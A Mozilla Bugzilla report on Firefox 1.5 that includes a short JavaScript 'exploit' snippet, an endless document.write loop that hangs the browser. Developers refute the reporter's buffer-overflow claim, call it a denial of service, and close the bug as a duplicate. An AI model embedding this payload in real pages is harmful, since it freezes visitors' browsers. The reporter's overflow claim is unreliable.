Closed
Bug 330893
Opened 19 years ago
Closed 19 years ago
Firefox Bug in Javascript and Buffer Overflow
Categories
(Core :: JavaScript Engine, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 112858
People
(Reporter: guelfoweb, Unassigned)
References
()
Details
(Keywords: hang, Whiteboard: [sg:dos])
Attachments
(1 file)
|
193 bytes,
text/html
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
If you run code without security extention (noscript, etc.) on Windows XP SP2, it generates a buffer owerflow. In order to finish the process you must kill the application from task bar.
Code Javascript Exploit:
--------------------------------------------------
<script language="JavaScript1.2" type="text/javascript">
function exploit() {}
for (k=0;k<k+1;k++){document.write('<a href="javascript:exploit()");"><img src=""/</a></a>'); }
</script>
--------------------------------------------------
Reproducible: Always
|
||
Comment 1•19 years ago
|
||
I don't see an buffer overflow on trunk or 1.5.0.2, just a DOS like bug 320760 and transitively bug 317334. The test continually uses memory so there may be a out of memory or gc related crash someday
|
||
Comment 2•19 years ago
|
||
I also don't see any kind of buffer overflow here. It is annoying that the runaway-script detection is foiled by this, though -- it's a pretty effective DoS.
Clearing the security flag, pointless since this is from a public blog.
|
|
||
Updated•19 years ago
|
Component: JavaScript Console → JavaScript Engine
Product: Firefox → Core
Version: unspecified → Trunk
|
|
||
Comment 3•19 years ago
|
||
better dupe candidate: 112858
*** This bug has been marked as a duplicate of 112858 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•